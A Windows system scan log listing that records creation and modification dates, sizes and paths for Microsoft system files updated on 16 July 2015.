2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
